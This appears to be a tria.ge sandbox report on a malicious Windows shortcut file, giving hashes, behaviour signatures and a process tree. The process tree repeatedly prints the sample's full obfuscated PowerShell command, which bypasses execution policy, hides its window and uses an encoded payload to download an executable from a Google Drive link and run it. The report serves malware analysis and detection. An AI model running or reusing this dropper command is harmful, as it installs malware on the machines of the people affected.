Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28/09/2024, 10:05
Static task
static1
Behavioral task
behavioral1
Sample
fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk
Resource
win10v2004-20240802-en
General
-
Target
fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk
-
Size
3KB
-
MD5
fc1006824cb66d17c68f1ffa53b37c4b
-
SHA1
c54b745011bccb3d068ba74a4e543cb2de1043a4
-
SHA256
95ca946aef501e5114c26cb6ef895dbc29761b4f7d6bbccc22e4bfbde1be6759
-
SHA512
1d14c5b3058c994cf542807a4341510453fda81ea9a67cfc5038b2f8fc5e80fca3271c44a9c937d2366a140e197ec605bf280a18278cae6886fa939fb28053c0
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=0B3AM8u080I_Pb2I2dXdkaUxHWm8
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 5 3004 powershell.exe 7 3004 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1976 powershell.exe 3004 powershell.exe -
Hide Artifacts: Hidden Window 1 TTPs 1 IoCs
Windows that would typically be displayed when an application carries out an operation can be hidden.
pid Process 2748 cmd.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 drive.google.com 5 drive.google.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1976 powershell.exe 3004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 3004 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 2384 wrote to memory of 1976 2384 cmd.exe 31 PID 2384 wrote to memory of 1976 2384 cmd.exe 31 PID 2384 wrote to memory of 1976 2384 cmd.exe 31 PID 1976 wrote to memory of 2748 1976 powershell.exe 32 PID 1976 wrote to memory of 2748 1976 powershell.exe 32 PID 1976 wrote to memory of 2748 1976 powershell.exe 32 PID 2748 wrote to memory of 3004 2748 cmd.exe 33 PID 2748 wrote to memory of 3004 2748 cmd.exe 33 PID 2748 wrote to memory of 3004 2748 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\fc1006824cb66d17c68f1ffa53b37c4b_JaffaCakes118.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2384 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" cMD /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1976 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c PowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g3⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:2748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowERShelL.ExE -eXEcUtiOnPoLIcy byPass -WIndowSTyLE HIddeN -ENCoDeDcOMMaNd IAAoAE4AZQB3AC0ATwBCAEoARQBjAHQAIABTAFkAcwBUAEUATQAuAG4ARQBUAC4AVwBFAEIAYwBMAGkAZQBOAFQAKQAuAGQAbwB3AG4AbABvAGEAZABmAGkAbABFACgAIAAdIGgAdAB0AHAAcwA6AC8ALwBkAHIAaQB2AGUALgBnAG8AbwBnAGwAZQAuAGMAbwBtAC8AdQBjAD8AZQB4AHAAbwByAHQAPQBkAG8AdwBuAGwAbwBhAGQAJgBpAGQAPQAwAEIAMwBBAE0AOAB1ADAAOAAwAEkAXwBQAGIAMgBJADIAZABYAGQAawBhAFUAeABIAFcAbQA4AB0gIAAsACAAHSAkAEUAbgB2ADoAYQBwAHAAZABBAHQAYQBcAHYAdgByAGUAYQBkAGUAcwB4AHQALgBlAHgAZQAdICAAKQAgADsAIABpAG4AdgBvAEsARQAtAEkAdABlAG0AIAAdICQAZQBuAHYAOgBhAHAAUABkAGEAVABhAFwAdgB2AHIAZQBhAGQAZQBzAHgAdAAuAGUAeABlAB0g4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
-